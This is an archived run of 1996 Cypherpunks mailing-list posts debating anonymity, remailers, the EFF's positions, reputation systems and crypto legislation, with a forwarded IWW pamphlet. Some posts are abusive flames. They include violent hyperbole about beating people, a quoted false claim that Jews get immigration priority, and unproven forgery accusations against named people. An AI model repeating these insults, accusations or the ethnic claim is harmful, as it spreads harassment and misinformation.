reasonable to come to the conclusion that there is no solution >to the anonymity "problem" that isn't worse than the underlying anonymity. >And, BTW, I don't consider a pro-anonymity position to be an extremist one. Yeah, the main point re. anonymity, IMO, is that you can't pretend that it's all pro, no con. You have to acknowledge and think through the negatives...and, as Tim May pointed out, that's already been done. I don't think you oughtta ream somebody for pointing to the down side. That you raise an issue should never be taken to imply that you've taken a position, and it's vital to remain open to discussion and entertain sentiments that oppose your own thinking. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From dlv at bwalk.dm.com Tue Sep 3 23:01:34 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 14:01:34 +0800 Subject: Voting Monarchist? In-Reply-To: <199609032341.QAA24172@netcom.netcom.com> Message-ID: <42oPTD12w165w@bwalk.dm.com> qut at netcom.com (Dave Harman OBC) writes: > ! > > Vote Monarchist > ! > > ! > who is the candidate? LaRouche? > ! > ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running > ! for president. Anyone who doesn't advocate killing all kings, presidents, > ! and prime ministers is a fucking statist and should be beaten to a pulp > ! with a rattan stick. > > That's the problem with the Libertarians, they've got some sort of > hang up about beatings. Must be some childhood difficulties. I ain't no fucking Libertarian. All Libertarians are fucking statists. P.S. you also wrote: ]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin ]the blame on the good doctor. I'm glad {s}he posted it, it was funny ]and it also gave a hint who did the forgery of Ingrid. Either ]someone out to get him, or the doctor himself, if so, he lives in ]New York City too! Maybe you can meet your secret admirer! While Rich Graves is a proven liar and forger, the article you refer to is a perfectly good and authentic article from Rabbi Shlomo R. I don't know who forged Ingrid - probably Rich Graves, a proven forger, liar, and a fucking Libertarian statist. ]Now if it's someone out to get the doctor, I'd pin the blame on ]Rich Graves, because of his obssessive hatred of Ingrid, in which ]he did the post so it could be blamed on Dr. Fuckhead, who ]perhaps would hate Ingrid too, because she has written many times ]about how her family was hurt by Russians and Jews. Dr. Fuckhead ]may be Jewish, you know, since 80% of immigrants from Russia this ]generation have been Jewish, because Jews have first priorty in ]USA immigration law. Yes, I'm Jewish. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jonl at well.com Tue Sep 3 23:05:06 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 14:05:06 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904034147.006f6cd4@mail.well.com> At 08:04 PM 9/3/96 -0700, Timothy C. May wrote: >The reason this is such a hot button for Cypherpunks is that "responsible >freedom" and "accountability" are often code words for controlling some >very basic freedoms. Placing limits on anonymous speech would involve some >very fundamental restrictions on freedoms of various sorts. Even if >"safeguards" are built-in, the effect would almost certainly be to >illegalize remailers (unless they had "escrow" features!). And a wide array >of other freedoms, too numerous for me to write about here. The terms "responsibility" and "accountability" are misused, which is unfortunate, since I think we'd all argue in favor of taking responsibility for our speech/actions in a positive sense. The negative is in asking me to sacrifice my freedom because some few behave irresponsibly. This is like setting an illogical default, assuming that it's a preventive, but it prevents nothing. Getting beyond this discussion of EFF, has any global entity discussed making remailers illegal? jonl -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From mech at eff.org Tue Sep 3 23:05:55 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 14:05:55 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609032113.OAA06380@dns2.noc.best.net> Message-ID: <199609040043.RAA05468@eff.org> James A. Donald typed: > > At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: > > EFF in generally does not issue extremist position > > statements, but is careful to examine the risks as well as the benefits, > > and look for pro-liberty solutions to those risks. > > If the right to speak anonymously is an "extremist" position in the eyes > of the EFF, then they are no friends of liberty. Recognition of the right to anything without recognition of the ethics that need to be observed in excerising that right, is an extremist position just as much as is a demand people give up liberty so that "responsibility" can be enforced. It's probably far less dangerous in most cases, but it's still rather indefensible. That's all. We certainly do NOT advocate what you may be misinterpreting as our position: that rights should or must be taken away when people behave unethically, or due to the fear that people will behave unethically. That's precisely the opposite of our opinion on everything we have an opinion on. We hold that liberty must be preserved *in spite of* inevitable abuses. But we also hold that it's important to know the ethics that come with rights, to adhere to them, to educate other people about them. Otherwise the rights aren't worth much. What is the value of free speech if every message you receive is a threat, defamation, spam, or private information stolen from someone else? (to give a fairly extreme example). > It is the overwhelmingly mainstream position, not just among netizens, > but when last heard, amongst supreme court judges and ordinary people > in the street. I believe we are talking about precisely the same position, just in different terms. Let's not argue. :) -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From banisar at epic.org Tue Sep 3 23:06:43 1996 From: banisar at epic.org (Dave Banisar) Date: Wed, 4 Sep 1996 14:06:43 +0800 Subject: Anonymity Message-ID: Speaking of anonymous transactions, a fair trading office in London found that mondex is not truly anonymous (they were claiming it for a while until the complaint was filed by PI director Simon Davies). A couple of docs are available at http://www.privacy.org/pi/activities/mondex/ Dave _________________________________________________________________________ Subject: Anonymity _________________________________________________________________________ David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.epic.org Washington, DC 20003 * ftp/gopher/wais cpsr.org From tcmay at got.net Tue Sep 3 23:11:52 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 14:11:52 +0800 Subject: Reputations Message-ID: Something closely related to anonymity issues is _reputation_. As I keep saying, there have been dozens of articles on this and similar topics. Mostly in the early days, when we were exploring such things (well, some of us has started exploring them some years earlier...). Regrettably, the archive system is not very functional, especially not for older articles (there are rumors that L. Todd Masco took down the archive site due to pressure from the "Wall Street Journal" over their copyrighted articles in the archives...those Web spiders find all such copyright violations!). Here's another fragment of my Cyphernomicon, making some points about positive reputations. Briefly, think of "restaurants" when thinking about reputations. If one arrives in a new city, most restaurants may have the same baseline reputation, e.g. "none." A few may be known by name, for their "reputation," either good ("You have to eat at Louie's--the laser chicken is incredible") or bad ("Blecch!). Positive reputations and negative reputations are self-explanatory. And the reputations of others may affect the reputations of restaurants ("John Gilmore says he likes the Burma Burger on Castro Street."). Bad recommendations may affect the "reputation capital" of John, for example. (We speak of "reputation capital" because it can in some sense be "spent.") And so on. Many of the debates about anonymity seem to ignore reputations, filters, kill files. It is almost as if the critics of anonymous speech are saying "If there is not accountability for restaurant recommendations, we'll all be buried in garbage food." This ignores the _emergent order_ or _evolutionary_ nature of actors in the restaurant and restaurant evaluator market. Free speech is often messy. 98% of everything I read or hear is crap, to do Sturgeon one better. But I use judgement to decide what to read, who to listen to, and what to mostly ignore. I use _reputation_ to choose restaurants, books, movies, speakers to listen to, etc. Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take a while to gather a "positive reputation," and some never do. This is the way speech works. "Accountability" is a red herring. Anyway, here's the promised excerpt: 15.5.5. reputations are what keep CA systems from degenerating into flamefests - digital pseudonyms mean a trail is left, kill files can be used, and people will take care about what they say - and the systems will not be truly anonymous: some people will see the same other people, allowing the development of histories and continued interactions (recall that in cases where no future interaction is exected, rudeness and flaming creeps in) + "Rumormonger" at Apple (and elsewhere) always degenerates into flames and crudities, says Johann Strandberg - but this is what reputations will partly offset 15.5.6. "brilliant pennies" scam 15.5.7. "reputation float" is how money can be pulled out of the future value of a reputation 15.5.8. Reputation-based systems and repeat business + reputations matter...this is the main basis of our economic system - repeat business....people stop doing business with those they don't trust, or who mistreat them, or those who just don't seem to be reputable - and even in centrally-controlled systems, reputations matter (can't force people to undertake some relations) - credit ratings (even for pseudonyms) matter - escrow agents, bonding, etc. - criminal systems still rely on reputations and even on honor - ironically, it is often in cases where there are restrictions on choice that the advantages of reputations are lost, as when the government bans discrimination, limits choice, or insists on determining who can do business with who + Repeat business is the most important aspect - granularity of transactions, cash flow, game-theoretic analysis of advantages of "defecting" - anytime a transaction has a value that is very large (compared to expected future profits from transactions, or on absolute basis), watch out - ideally, a series of smaller transactions are more conducive to fair trading...for example, if one gets a bad meal at a restaurant, one avoids that restaurant in the future, rather than suing (even though one can claim to have been "damaged") - issues of contract as well We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Tue Sep 3 23:13:42 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 14:13:42 +0800 Subject: What is the EFF doing exactly? Message-ID: At 3:41 AM 9/4/96, Jon Lebkowsky wrote: >The terms "responsibility" and "accountability" are misused, which is >unfortunate, since I think we'd all argue in favor of taking responsibility >for our speech/actions in a positive sense. The negative is in asking me to >sacrifice my freedom because some few behave irresponsibly. This is like >setting an illogical default, assuming that it's a preventive, but it >prevents nothing. Well, I've written a lot (or forwarded a lot) on various aspects of this issue. Both terms are _overloaded_, probably to the point of not even being useful terms for this debate. Everyone comes in to the debate with their notions of what "responsible" speech is, what "accountability" entails, etc. Having said this, and not knowing how your (or anyone else's) definitions relate to mine, I simply don't agree that I have to take responsibility for all of my speech/actions. I can think of many cases where I have elected to use untraceable anonymity, as many others have, so those are direct counterexamples to your point, thus disproving your "I think we'd all argue in favor of taking responsibility" point. (A vast number of other points worthy of discussion. I am happy to hear from at least two EFF "insiders" that this issue is being discussed within EFF as we speak. It's about time. Anonymity is a whole lot more than just about "anonymous posts" from "Mr. Anonymous." The issue hits on issues of True Names, speech licenses, escrow, legality of remailers, business vs. personal speech, etc.) >Getting beyond this discussion of EFF, has any global entity discussed >making remailers illegal? > By "global entity" do you mean the U.N., or the Borg? The G7 issued a typically vague statement about cracking down on terrorist communications...this could be construed as the beginnings of an assault on Cypherpunkish sorts of things. Too soon to tell. The Church of Scientology (the same group which favorable quotes Esther Dyson's concerns about anonymity and dangerous speech) has of course been targetting remailers for a long time. Not in getting them outlawed, but in getting them to to divulge names and logs. This has the effect of harassing remailers, and causing some to discontinue them...probably a desired effect. Julf's shutdown of Penet they probably are dancing a jig over (but the last laugh will be when users transition to a world-wide, distributed, robust network of Cypherpunks-style remailers). Within the U.S. there are few ways remailers could be shut down, in terms of legal action. The various Supreme Court cases have been discussed many times. I suspect the Digital Telephony Act could be invoked to demand that ISPs make their systems wiretappable: then, if the presence of a remailer defeats this wire-tappability, the ISP could force the remailer off. (I'm not an expert, but I believe DT doesn't apply to computer bulletin boards and ISPs, only to phone systems. But as Internet telephony spreads, and any ISP may also be a de facto phone system, couldn't the language of DT be extended to cover ISPs? This is something I worried about at the time the EFF helped give us Digital Telephony.) If legislation passes that makes carrying and producing identification mandatory (and this could happen by either the immigration or anti-terrorism route, or both), and if the Postal Service succeeds in getting accepted their scheme to require positive identification of all letter and package senders, then the same sorts of laws could be used to require that all e-mail messages have a True Name attached. Poof, there go the remailers. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From hvdl at sequent.com Tue Sep 3 23:55:59 1996 From: hvdl at sequent.com (Hans Unicorn Van de Looy) Date: Wed, 4 Sep 1996 14:55:59 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) In-Reply-To: Message-ID: <9609040450.AA01346@amsqnt.nl.sequent.com> Hi Tim, The one-and-only Timothy C. May once stated: ! At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote: ! >:: ! >Request-Remailing-To: remailer at huge.cajones.com ! .... ! >:: ! >Request-Remailing-To: remailer at remailer.nl.com ! .... ! >:: ! >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod) ! > ! ! ! >Deep Throat. ! ! ! Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines! Like I explained before, this was a problem with a user of one of my/our systems, and has been taken care of. ! At least now we know who the _other_ "Unicorn" is. Well that has never been a secret... Has it? ! How's Sequent doing? Is Casey Powell still there? Sequent is doing extremely well. New architecture well on it's way, looking good! And yes, Casey is still in charge. Wanna know more? Then let's continue this off line... ! --Tim May ! ! We got computers, we're tapping phone lines, I know that that ain't allowed. ! ---------:---------:---------:---------:---------:---------:---------:---- ! Timothy C. May | Crypto Anarchy: encryption, digital money, ! tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero ! W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, ! Licensed Ontologist | black markets, collapse of governments. ! "National borders aren't even speed bumps on the information superhighway." -- GreetZ, Hans. ==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============ ,;( )_, )~\| Hans "Unicorn" Van de Looy PGP: ED FE 42 22 95 44 25 D8 ;; // `--; GSM: +31 653 261 368 BD F1 55 AA 04 12 44 54 '= ;\ = | ==== finger hvdl at sequent.com for more info =================== From flengyel at dorsai.org Wed Sep 4 00:03:00 1996 From: flengyel at dorsai.org (Florian Lengyel) Date: Wed, 4 Sep 1996 15:03:00 +0800 Subject: The Esther Dyson Flap In-Reply-To: Message-ID: <322D3D08.314@dorsai.org> Dr.Dimitri Vulis KOTM wrote: > >>[excise] > > The gubment has no right to fuck with any speech - (seditius) libel, child > porn, bomb-making instructions... > Agreed. Otherwise, by a slipery slope argument, they can eventually supress any form of speech whatsoever. > > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From ses at tipper.oit.unc.edu Wed Sep 4 00:43:16 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 4 Sep 1996 15:43:16 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: It's the usual - if you want commercial jurisdiction, 40 bits unescrowed 64 bits (16 escrowed) Above that, you'll have to go through state on a per customer basis (which I don't think is that easy to get if software is being shipped outside the US, and is definitely going to be expensive.) Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From declan at well.com Wed Sep 4 00:44:00 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 15:44:00 +0800 Subject: Workers of the Web, UNITE! Message-ID: Tired: Libertarian cypherpunks Wired: Crypto-socialists "Whether they be fast-food workers, word processors, or micro-chip assemblers, today's non-union wage workers need the IWW's brand of no-compromise unionism even more than their predecessors." :) -Declan http://iww.org/tandv.html > THE WOBBLIES: > > Tactics and Vision for a New Workers' Movement > > An Introduction to the Industrial Workers of the World (IWW) > > ISN'T THE IWW JUST FOR FACTORY WORKERS? > > Every worker is an "industrial" worker - whether they work in health > care, tourism, education, or publishing. The relatively recent > association between the word "industry" and heavy manufacturing is > misleading, and was never intended to be by the founders of the IWW. > If you earn your living by working with your hands or your mind, > then you're welcome in the IWW. Only bosses (defined as those with > direct power to hire and fire) are excluded from IWW membership. > > The Wobblies (as members of the IWW are known) have historically > focused on helping organize those workers that the American > Federation of Labor (AFL) shunned. In the early 1900s that meant > African-Americans, immigrants, women, and unskilled laborers. Today > that means curbside recyclers, non-profit staffers, temp workers, > sex-industry workers, co-op employees -- in short, any worker in any > workplace regardless of size or structure. > > CAN THE IWW HELP ME TO IMPROVE THE WAGES OR WORKING CONDITIONS AT MY > CURRENT JOB? > > That largely depends on you. The IWW is a "do-it-yourself" union, > and does not provide an all-knowing leadership or hefty treasury to > fight your battles for you. But if you're willing to organize at > your job-site by talking with your co-workers about the issues that > matter to them, then you can count on your fellow workers in the IWW > to lend their full support to your struggle. > > Individual workers can accomplish little by themselves, and are > liable to be fired if they raise their voice in protest. But by > joining together in a union such as the IWW, workers are far more > powerful when confronting their boss about workplace injustices. Our > union can provide tangible, community-based resources such as > low-cost printing, speakers, legal advise, and how-to manuals, as > well as bodies on a picket line. You won't get bureaucrats in suits > and ties telling you how to run your strike, just friends lending a > hand where they can. > > THE IWW AND MAINSTREAM LABOR > > For almost a century, the leadership of the AFL-CIO has worked hand > in hand with the capitalists to squelch rank and file militancy. > Their overriding concern has been "industrial harmony," not economic > and social justice, and so they fail to question the most basic > assumptions of capitalist production. While union bosses play golf > with the titans of industry, real wages and safety conditions have > continued to worsen these last thirty years or so. > > Regular AFL trade unions split workers up into their respective > skills, allowing one craft union to cross the picket line of > another. The IWW believes in "industrial unionism," organizing all > workers in a given industry into the same union (thus our name). At > a construction site, for instance, the carpenters should be able to > count on the unswerving support of the plumbers, laborers, > electricians, and hod carriers in the event of a strike. This is > much simpler when all these workers are in the same industrial > union, rather than separate, even competing, trade unions. > > Some Wobblies find themselves in jobs where they are represented by > these more conservative trade unions. These "two- card" Wobs often > bring their IWW principles to the union hall with them, agitating > for rank and file democracy, more militant "direct action" tactics, > and class solidarity. The IWW does not believe in signing away the > right to strike ( the so-called "no strike" clause), nor does it > condone the "dues check-off," in which management deducts union dues > directly from the paycheck. While the IWW often does strike support > for other unions when necessary, we also try to keep our sights on > the bigger prize ahead. > > DIDN'T THE IWW DIE OUT? ARE ITS IDEAS STILL RELEVANT? > > The IWW was nearly crushed in the early 1920's by some of the > fiercest repression ever unleashed by big business and the U.S. > government. Because the IWW had strongholds in industries that were > critical to the First World War effort, and because they refused to > do their patriotic bit by signing no-strike pledges for the duration > of the war, the Wobblies were branded "pro-German" and relentlessly > persecuted. > > The world economy has changed a lot since the days when the IWW > controlled great sections of the logging, mining, and agricultural > industries. Yet despite tremendous technological advances and the > structural reorganization of capital, industrial unionism remains a > fundamentally sound basis for workers' self- organization. Today, > while mainstream labor tries desperately to hold its ground against > the anti-worker policies of the ruling political parties, vast new > sectors of the economy have opened up that the AFL-CIO would never > dream of organizing. > > Whether they be fast-food workers, word processors, or micro- chip > assemblers, today's non-union wage workers need the IWW's brand of > no-compromise unionism even more than their predecessors. Winning > the eight-hour day was not enough. We must redefine the very meaning > of work itself, and find ways to redistribute society's wealth for > the benefit of all. > > DOES THE IWW SUPPORT ANY POLITICAL PARTY? > > The IWW is a labor union, not a political party. We believe that > economic justice must be achieved through economic struggle, whether > that be with our boss or our landlord. The institutions of > government have always proven themselves to be the allies of > Capital, so we do not wait for politicians to free us from wage- > slavery. We believe our power lies in the workplace, not in "the > vote" - since it is our labor on which bosses are dependent. > > The IWW has successfully resisted attempts by various "left" parties > to make the union a mere tool of their political ambitions. Our > Constitution explicitly states "the IWW refuses all alliances, > direct and indirect, with existing parties and anti-political > sects." This policy has helped us avoid the sectarian feuding that > can easily destroy a group. > > True, our commitment to worker control and the abolition of > capitalism has not won us any friends among the ruling elites, and > our disavowal of all political party affiliation has not prevented > us from being red-baited. We address the root causes of this > society's problems, and that makes us "radical," but we have the > common sense to leave our electoral political views outside the > union hall where they belong. > > WHAT IS DIRECT ACTION? > > The labor movement has been most successful when it relied on the > direct intervention of the workers to obtain their demands. Rather > than allowing professional negotiators to speak for them, Wobblies > have engaged in those tactics which they could control themselves -- > strikes, slowdowns, monkey wrenching -- what we call sabotage. > > Sabotage in this context does not mean arson and dynamite. It's more > properly defined as "the conscious withdrawal of efficiency." > Staying at your workstation but reducing your production by half > will bring a boss to his knees quicker than a whole team of > negotiators. > > The IWW has never advocated violence. By fighting for justice with > non-violent tactics, the IWW has often won the support of an > initially mistrustful public. > > WHAT IS A GENERAL STRIKE? > > The General Strike has long been touted by militant unionists as the > ultimate expression of workers' power, and it still plays an > important role in the IWW's program for social change. Simply put, a > General strike is a massive work stoppage on a local, regional, or > national scale, and may involve people either staying home or > occupying their workplaces and refusing to work. > > A General Strike halts business as usual, and serves notice to those > in power that those of us doing the work have the ultimate say in > whether that work gets done or not. It debunks the myth that power > flows downward, and proves instead that all real power still resides > at the grassroots level, if we only choose to exercise it. > > The general Strike is a common tactic in many countries of the > world, yet most North American workers are unfamiliar with it. This > is largely the result of the conservative trade unions' reluctance > to flex their economic muscle and rock the boat. A great deal of > education and organization must take place before North American > workers are ready to wage a successful General Strike, and it's > toward this end that the IWW dedicates itself. > > THE IWW AND FEMINISM > > Women have been active in the IWW since its inception. Elizabeth > Gurley Flynn, one of the union's best know agitators, once said that > "the IWW has been accused of pushing women to the front. This is not > true. Rather, the women have not been kept in back, and so they have > naturally moved to the front." > > Much of the work that has traditionally been done by women was not > recognized as such by the male-run business unions. The IWW supports > the right of homemakers, sex-industry workers, and other women to > organize for better conditions and wages just like other workers. > > THE IWW AND MILITARISM > > Wars between nations have never benefitted the working class, and > they never will. The war profiteers, safe in their mansions and > boardrooms, never consider the human cost of their military > adventurism. Working people are mere cannon fodder for their > corporate and imperialist ambitions. > > Real working class solidarity does not recognize the artificial > borders erected between nation-states, but instead unites against a > common class enemy. Poor people, especially those of color, make up > a disproportionate part of the armed forces, simply because few > other economic options are available. > > To put an end to war, working people must lay down their arms and > refuse to fight for their masters. Unfortunately, many have been > brainwashed into thinking that their interests are the same as those > of the people in power, so this is easier said than done. > Nevertheless, the IWW is committed to fighting patriotic propaganda > by educating workers about where their real self-interest lies. > > THE IWW AND THE ENVIRONMENT > > Bhopal, Chernobyl, the Exxon Valdez oil spill... These are just a > few examples of how dangerous it can be to put profit before people. > Government regulation and public outcry can at best slow down the > destruction of our planet, not reverse it. > > Workers and their families suffer the worst effects of pollution. > The workplace continues to be a very dangerous environment, and > working class communities are often the site for toxic dumps, > incinerators, and the like. > > Workers' control of all industry is the only practical strategy for > assuring the practice of sustainable and environmentally sound forms > of production. For if the workers in all polluting industries were > to withdraw their labor, the poison factories could be shut down in > a matter of weeks. The workers themselves must decide whether or not > what they produce is socially useful. > > JOIN THE I.W.W. > > NO BUREAUCRATS - Aside from the modestly paid General > Secretary/Treasurer, the I.W.W. has no paid officers. The General > Executive Board is elected annually by the entire membership, and > its job is to oversee the running of union affairs, not to set > policy. All officers may be recalled at any time by referendum. > > REAL DEMOCRACY - All policy decisions are made by the members > themselves by referendum. All branches maintain full autonomy on > matters within their jurisdiction. Job branches (I.W.W. groups > composed of workers at a single job-site) set their own demands and > strategies in negotiations, free of meddling internaitonals or > sellout business agents. > > LOW DUES - Our dues are structured on a sliding scale basis. > Unemployed and low-income workers pay $5 a month; those making > between $800 and $1,700 per month pay $9; members making more than > $1,700 per month pay $12 monthly dues; and workers in extremely poor > financial situations may pay only $3 per month. Initiation fees > equal one month's dues; so a very low-income worker can join for as > little as $6. > > TO JOIN - Fill out the questions below and send a copy of this form > with your check or money order (in U.S. funds) to I.W.W., 103 W. > Michigan Ave., Ypsilanti, MI 48197, USA. > > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > > ___ I affirm that I am a common worker without direct power to hire > and fire. > > ___ I agree to abide by the constitution and regulations of this > organization. > > ___ I will study its principles and make myself acquainted with its > purposes. > > Name ____________________________________________________________ > > Occupation ______________________________________________________ > > Industry ________________________________________________________ > > Address _________________________________________________________ > > City ____________________________________________________________ > > State/Province __________________________________________________ > > Zip _____________________________________________________________ > > Phone ___________________________________________________________ > > Email ___________________________________________________________ > > Total amount enclosed $__________________________________________ > > Initiation $_____________________________________________________ > > Dues $ __________________________________________________________ > > When you join the I.W.W., you'll receive a free subscription to our > newspaper, the Industrial Worker, in addition to your membership > card, constitution, button, and the One Big Union pamphlet which > describes the structure and function of the I.W.W. in detail. You'll > also start to get a monthly publication for members only called the > General Organization Bulletin, which contains Board motions, > financial reports, and members' discussion of various internal > matters such as upcoming referenda. And if you have access to email, > you'll be invited to join a growing network of Wobblies engaging in > on-line communications. > > IWW PREAMBLE > > The working class and the employing class have nothing in common. > There can be no peace so long as hunger and want are found among > millions of working people; and the few, who make up the employing > class, have all the good things in life. > > Between these two classes a struggle must go on until the workers of > the world organize as a class, take possession of the machinery of > production, abolish the wage system, and live in harmony with the > earth. > > We find that the centering of the management of industries into > fewer and fewer hands makes the trade unions unable to cope with the > ever growing power of the employing class. The trade unions foster a > state of affairs which allows one set of workers to be pitted > against another set of workers in the same industry, thereby helping > to defeat one another in wage wars. Moreover, the trade unions aid > the employing class to mislead the workers into the belief that the > working class has interests in common with its employers. > > These conditions can be changed and the interests of the working > class upheld only by an organization formed in such a way that all > its members in any one industry, or in all industries if necessary, > cease work whenever a strike or lockout is on in any department > thereof, thus making an injury to one an injury to all. > > Instead of the conservative motto, "A fair day's wage for a fair > day's work," we must inscribe on our banner the revolutionary > watchword, "Abolition of the wage system." > > It is the historic mission of the working class to do away with > capitalism. The army of production must be organized, not only for > the everyday struggle with capitalists, but also to carry on > production when capitalism shall have been overthrown. By organizing > industrially we are forming the structure of the new society within > the shell of the old. > > CONTACT THE IWW GENERAL HEADQUARTERS AT > 103 W. Michigan Ave. > Ypsilanti, MI 48197, USA > ph: 313-483-3548 > fax: 313-483-4050 > email: iww at igc.apc.org From jimbell at pacifier.com Wed Sep 4 00:49:14 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 15:49:14 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609040534.WAA18683@mail.pacifier.com> At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote: >The terms "responsibility" and "accountability" are misused, which is >unfortunate, since I think we'd all argue in favor of taking responsibility >for our speech/actions in a positive sense. The negative is in asking me to >sacrifice my freedom because some few behave irresponsibly. This is like >setting an illogical default, assuming that it's a preventive, but it >prevents nothing. > >Getting beyond this discussion of EFF, has any global entity discussed >making remailers illegal? The Leahy crypto bill introduced early this year made (paraphrasing) "the use of encryption to thwart a law-enforcement investigation illegal." I immediately pointed out that while this wouldn't make _encrypted_ remailers illegal, per se, effectively it would because the moment an investigation (even a phony or trumped-up one) is started and is "thwarted" by the encryption used, the remailer operator became guilty of a crime. True, the USG isn't quite a "global entity" (even though it has a nasty habit of behaving like it!), but along with Europe (which would presumably treaty with USG any such restrictions) it's the next closest thing. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Wed Sep 4 01:09:25 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 16:09:25 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609040412.VAA13877@mail.pacifier.com> At 03:02 PM 9/3/96 -0700, Stanton McCandlish wrote: >> But we do not want legislation, so we do not want to help write legislation. >> >> We want to delay legislation for as long as possible, for the longer the >> delay, the more the balance of power favors the net and disavors the pols. >> >> Therefore the correct strategy is simply to attack any politician who shows >> any interest in legislating on our issues. >> >> We have no friends on Capitol hill, and if we did have friends, it would >> still be necessary to denounce them as enemies. > >I agree with the general sentiment behind this, but I think it may go a >bit overboard. For example, it is worthwhile to support Pro-CODE and SAFE >(the two crypto bills now floating around in Congress). On the surface >they both appear to threaten the viability of the Bernstein, Karn and >Junger cases, but in reality neither of these bills have a chance in hell >of passage. Be careful, Leahy's bill sucked. I don't classify it as "pro-crypto" at all, although if you believed those organizations that initially supported it you'd come to that conclusion. So somebody following your analysis (blindly) might have inadvertently embraced a clunker, concluding that supporting SOMETHING was important for the reasons you listed. And while this may appear to be paranoia, I suspected that that the whole reason for the Leahy bill was to get the "criminalization of the use of encryption" section on the books, the one truly awful part of the bill. The funny thing is, it almost worked! Didn't it, EFF?!? Burns' bill seems to be at least moderately acceptable, in that it appears to remove most restrictions on crypto export. Further, I don't necessarily share your pessimism that these bills won't pass. Not this year, of course, but possibly next year. Jim Bell jimbell at pacifier.com From jf_avon at citenet.net Wed Sep 4 01:12:14 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Wed, 4 Sep 1996 16:12:14 +0800 Subject: [NOISE^2] Re: Voting Monarchist? Message-ID: <9609040557.AA13191@cti02.citenet.net> On 3 Sep 96 at 16:06, David M. Rose wrote: > Dimitri, err, Dr. Vulis, or is that Dr. Nuri?, Well, is astonishlingly sounds the same... Makes me think of a rabbid Det<^h^h^h>Rotweiler. :) jfa From qut at netcom.com Wed Sep 4 02:05:26 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 17:05:26 +0800 Subject: {Rich Graves Only} Enclosed Message-ID: <199609040443.VAA23153@netcom.netcom.com> Newsgroups: alt.revisionism,alt.fan.ernst-zundel,alt.politics.white-power Subject: Re: Nomination: The Right Reverend Colin James III for Kook of the Month References: <50i362$71q at Networking.Stanford.EDU> In <50i362$71q at Networking.Stanford.EDU> llurch at stanford.edu (Rich Graves) writes: ! shlomo at bwalk.dm.com () writes: ! >The Right Reverend Colin James III got Andrew Mathis ! >fired from his second job in two months (at the Princeton Review, on Thursday). ! >I hereby nominate the dear bishop for both the Kook of the Month for September ! >1996 and for the Golden Killfile Award. Vote early and often! ! ! Vulis, you've already earned your Kook of the Month laurels. It's nap ! time. Since you know that is Dr. D, why did you blame the harassment of Ingrid on Rev. Ron?!????? It looks like you did it to pin it on the doctor, or more likely, you saw the opportunity to harass Rev. Ron, even after you feigned praise of him! It's the same damned header, IDJIT. Of course, I never saw the headers for the unidentified harasser to the Zgrams list, was that the same header, too? It looks like you did it or you know who did it and you want to compound harassment on to nswpp! How Gravesian! Is Dr. D your friend your talking about? Dr. D, defect, defect! He's a jerk, jerk! -- | | | | | | | | | | | | | | _|__|__|__|__ /--------------\ | | | 0 0 |--\ | * | | | \-------/ | | | \_____/ |__/ \______________/ ����ב�� ������ From qut at netcom.com 